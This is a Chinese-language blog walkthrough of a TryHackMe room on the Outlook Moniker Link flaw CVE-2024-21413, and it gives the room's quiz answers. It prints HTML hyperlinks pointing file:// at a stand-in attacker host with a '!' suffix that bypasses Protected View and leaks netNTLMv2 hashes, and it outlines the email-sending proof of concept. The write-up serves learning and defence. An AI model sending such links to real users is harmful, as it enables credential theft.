深度剖析Outlook高危漏洞CVE-2024–21413：Moniker Link的利用与防御

Tryhackme — Moniker Link (CVE-2024–21413)

任务 1 — 简介
2024年2月13日，微软公布了一个Microsoft Outlook远程代码执行（RCE）及凭证泄露漏洞，分配的CVE编号为CVE-2024–21413（Moniker Link）。Check Point Research的Haifei Li被确认发现了此漏洞。

该漏洞在处理一种称为“Moniker Link”的特殊超链接时，绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞，一旦受害者点击该超链接，就会导致Outlook将用户的NTLM凭证发送给攻击者。

回答以下问题：
该CVE被分配的“严重性”等级是什么？
= 严重

任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link，我们可以指示Outlook尝试访问一个文件，例如网络共享上的文件（<a href="file://ATTACKER_IP/test">Click me</a>）。此过程使用SMB协议，该协议会使用本地凭证进行身份验证。然而，Outlook的“受保护的视图”功能会捕获并阻止此尝试。

<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>

此处的漏洞在于，修改我们的超链接，在Moniker Link中包含!特殊字符和一些文本，从而绕过Outlook的“受保护的视图”。例如：
<a href="file://ATTACKER_IP/test!exploit">Click me</a>.

<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>

作为攻击者，我们可以提供这种性质的Moniker Link进行攻击。请注意，远程设备上并不需要实际存在该共享，因为无论如何都会尝试进行身份验证，从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。

远程代码执行是可能的，因为Moniker Link在Windows上使用了组件对象模型。不过，对此进行解释目前超出了本房间的范围，因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。

回答以下问题：
我们在超链接中使用哪种Moniker Link类型？
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么？
= !

任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink

概念验证：

• 需要攻击者和受害者的电子邮件。通常，你需要使用自己的SMTP服务器（本房间已为你提供）。
• 需要密码进行身份验证。在本房间中，attacker@monikerlink.thm的密码是attacker。
• 包含电子邮件内容 (html_content)，其中包含我们作为HTML超链接的Moniker Link。
• 然后，填写电子邮件中的“主题”、“发件人”和“收件人”字段。
• 最后，将电子邮件发送到邮件服务器。

我们在AttackBox上用来捕获用户哈希的应用程序名称是什么？
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么？
= netNTLMv2

其他任务涉及新的Outlook更新，如果不看答案，你可能无法完成房间，因此答案已在任务本身中给出。

这是我的学习总结，希望对你有帮助，别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号（办公AI智能小助手）
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号（网络安全技术点滴分享）